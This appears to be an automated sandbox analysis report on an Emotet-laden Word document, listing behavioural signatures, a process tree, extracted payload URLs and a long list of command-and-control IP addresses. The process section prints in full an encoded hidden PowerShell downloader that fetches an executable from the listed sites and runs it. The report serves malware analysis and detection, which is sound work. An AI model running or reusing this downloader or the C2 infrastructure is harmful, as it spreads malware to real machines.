Analysis
-
max time kernel
29s -
resource
win10v191014 -
submitted
14-01-2020 01:55
General
Malware Config
Extracted
http://www.opccmission.org/wp-includes/PRQWj892236/
http://butterflyvfx.synergy-college.org/3fb7513/
https://www.app48.cn/logreport/01416692/
http://diek.nou.nl/app/gC4059/
http://www.aiga.it/wp-admin/2Hf689/
Extracted
emotet
99.252.27.6:80
152.231.89.226:80
86.123.138.76:80
192.241.143.52:8080
159.65.241.220:8080
45.79.95.107:443
69.163.33.84:8080
37.187.6.63:8080
59.120.5.154:80
188.135.15.49:80
125.99.61.162:7080
120.150.247.164:80
189.19.81.181:443
190.210.236.139:80
190.17.44.48:80
142.93.114.137:8080
93.144.226.57:80
172.104.169.32:8080
178.79.163.131:8080
94.200.126.42:80
37.120.185.153:443
76.69.26.71:80
46.101.212.195:8080
118.36.70.245:80
68.174.15.223:80
177.34.142.163:80
181.30.61.163:80
217.199.160.224:8080
177.242.21.126:80
2.47.112.72:80
2.42.173.240:80
186.15.52.123:80
83.165.78.227:80
109.169.86.13:8080
189.26.118.194:80
14.201.35.38:80
82.196.15.205:8080
96.61.113.203:80
110.170.65.146:80
14.160.93.230:80
190.210.184.138:995
216.251.83.79:80
62.15.36.103:443
89.211.114.203:80
203.25.159.3:8080
85.105.241.192:80
181.36.42.205:443
207.154.204.40:8080
212.71.237.140:8080
144.139.56.105:80
177.103.159.44:80
185.86.148.222:8080
200.45.187.90:80
113.61.76.239:80
62.75.160.178:8080
45.8.136.201:80
114.109.179.60:80
58.162.218.151:80
181.167.96.215:80
179.208.84.218:8080
79.7.114.1:80
190.100.153.162:443
68.187.160.28:443
46.28.111.142:7080
203.130.0.69:80
185.94.252.12:80
97.120.32.227:80
91.205.215.57:7080
201.213.32.59:80
187.188.166.192:8080
190.151.5.130:443
81.213.78.151:443
110.142.161.90:443
181.129.96.162:990
80.11.158.65:8080
186.68.48.204:443
200.123.183.137:443
119.59.124.163:8080
50.28.51.143:8080
87.106.77.40:7080
91.74.175.46:80
185.160.212.3:80
185.160.229.26:80
81.16.1.45:80
165.228.195.93:80
186.15.83.52:8080
68.183.190.199:8080
2.45.112.134:80
190.191.82.216:80
190.219.149.236:80
87.106.46.107:8080
202.62.39.111:80
77.55.211.77:8080
181.30.61.163:443
149.62.173.247:8080
104.131.58.132:8080
139.162.118.88:8080
138.68.106.4:7080
113.190.254.245:80
177.92.14.34:80
94.176.234.118:443
200.58.83.179:80
63.248.198.8:80
62.75.143.100:7080
201.213.100.141:8080
58.171.38.26:80
189.201.197.98:8080
181.10.204.106:80
68.183.170.114:8080
151.80.142.33:80
91.117.159.233:80
5.88.27.67:8080
72.29.55.174:80
79.7.158.208:80
5.196.35.138:7080
175.114.178.83:443
86.42.166.147:80
151.237.36.220:80
190.186.164.23:80
82.8.232.51:80
192.241.146.84:8080
191.103.76.34:443
190.195.129.227:8090
187.54.225.76:80
191.183.21.190:80
181.231.220.232:80
200.55.53.7:80
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4976 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3712 5100 powershell.exe 73 -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 3712 wrote to memory of 4756 3712 powershell.exe 80 PID 4756 wrote to memory of 3864 4756 657.exe 81 PID 4444 wrote to memory of 4080 4444 methodsdispid.exe 83 -
Executes dropped EXE 4 IoCs
pid Process 4756 657.exe 3864 657.exe 4444 methodsdispid.exe 4080 methodsdispid.exe -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
pid Process 3864 657.exe 4080 methodsdispid.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4976 WINWORD.EXE 4756 657.exe 3864 657.exe 4444 methodsdispid.exe 4080 methodsdispid.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3712 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3712 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File renamed C:\Users\Admin\657.exe => C:\Windows\SysWOW64\methodsdispid.exe 657.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ca99f191c3ae6a2034d8370f23374146725012b89a87773d3675eb41a1176599.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:4976
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -en JABLAHIAbQB3AG0AZQBuAHIAcgBhAGEAaAA9ACcAQgB0AHkAegBiAGsAZwBqAGQAJwA7ACQAUwBmAHAAYwBsAHAAZQB2AGkAdgBqACAAPQAgACcANgA1ADcAJwA7ACQASgBsAHMAaABoAG0AegBmAHEAeQB5AD0AJwBKAHkAeABhAGUAbwB1AHUAJwA7ACQAUABvAHAAZAB2AGYAegBiAHEAbABnAHAAbwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUwBmAHAAYwBsAHAAZQB2AGkAdgBqACsAJwAuAGUAeABlACcAOwAkAEIAagB2AGgAdgBvAGEAbwA9ACcAWQB1AGIAeQBrAHMAbwBoAGwAcAAnADsAJABDAHcAdwBhAG4AawB5AGMAcABtAGEAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4ARQB0AC4AVwBFAEIAYwBsAEkARQBOAHQAOwAkAE4AZABjAGYAaABkAHcAbQBxAGcAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBvAHAAYwBjAG0AaQBzAHMAaQBvAG4ALgBvAHIAZwAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFAAUgBRAFcAagA4ADkAMgAyADMANgAvACoAaAB0AHQAcAA6AC8ALwBiAHUAdAB0AGUAcgBmAGwAeQB2AGYAeAAuAHMAeQBuAGUAcgBnAHkALQBjAG8AbABsAGUAZwBlAC4AbwByAGcALwAzAGYAYgA3ADUAMQAzAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBhAHAAcAA0ADgALgBjAG4ALwBsAG8AZwByAGUAcABvAHIAdAAvADAAMQA0ADEANgA2ADkAMgAvACoAaAB0AHQAcAA6AC8ALwBkAGkAZQBrAC4AbgBvAHUALgBuAGwALwBhAHAAcAAvAGcAQwA0ADAANQA5AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AYQBpAGcAYQAuAGkAdAAvAHcAcAAtAGEAZABtAGkAbgAvADIASABmADYAOAA5AC8AJwAuACIAUwBgAFAAbABpAFQAIgAoACcAKgAnACkAOwAkAE8AdwByAG0AagBpAHkAYwBxAHQAegBqAD0AJwBMAGUAZABxAHAAawBjAHkAZQBwAHcAeQBxACcAOwBmAG8AcgBlAGEAYwBoACgAJABGAG8AcAB3AHUAYwBpAGcAbgAgAGkAbgAgACQATgBkAGMAZgBoAGQAdwBtAHEAZwApAHsAdAByAHkAewAkAEMAdwB3AGEAbgBrAHkAYwBwAG0AYQAuACIAZABgAG8AYABXAG4ATABPAEEAZABmAGkAYABMAEUAIgAoACQARgBvAHAAdwB1AGMAaQBnAG4ALAAgACQAUABvAHAAZAB2AGYAegBiAHEAbABnAHAAbwApADsAJABOAGkAdQB6AGcAdQB5AHAAPQAnAFIAcAB0AHUAZQB1AHMAaABsACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAUABvAHAAZAB2AGYAegBiAHEAbABnAHAAbwApAC4AIgBMAGAAZQBuAGAAZwB0AEgAIgAgAC0AZwBlACAAMgA1ADMANwA2ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAYABUAEEAUgB0ACIAKAAkAFAAbwBwAGQAdgBmAHoAYgBxAGwAZwBwAG8AKQA7ACQAVgB6AHMAcwBxAHMAYwBwAD0AJwBNAGMAZABsAGYAawBrAGUAbQBwAHYAawAnADsAYgByAGUAYQBrADsAJABKAGQAegB1AGUAcgBlAGUAcQBqAG4AdQBoAD0AJwBHAG4AcwB2AHoAYwByAHIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASQB3AGgAdQB1AGkAawBjAHcAagBtAD0AJwBMAHMAbwBoAGwAdQB4AGsAZAAnAA==1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3712 -
C:\Users\Admin\657.exe"C:\Users\Admin\657.exe"2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4756 -
C:\Users\Admin\657.exe--67bc65d63⤵
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
- Drops file in System32 directory
PID:3864
-
-
-
C:\Windows\SysWOW64\methodsdispid.exe"C:\Windows\SysWOW64\methodsdispid.exe"1⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4444 -
C:\Windows\SysWOW64\methodsdispid.exe--f4d1fd052⤵
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
PID:4080
-